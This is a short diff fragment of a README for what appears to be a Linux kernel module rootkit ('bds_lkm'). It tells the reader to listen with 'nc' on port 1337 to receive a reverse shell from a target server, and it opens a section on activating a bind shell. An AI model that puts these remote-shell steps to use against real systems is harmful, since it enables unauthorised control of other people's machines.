bluedragonsecurity/bds_lkm/README.md

 <pre>
 nc server ip 1337
 </pre>
-Wait a few seconds and you will get reverse shell port connection from your target server
+Wait a few seconds and you will get reverse shell port connection from your target server.
 </p>
 <p>
 <b>Activating Bind Shell</b>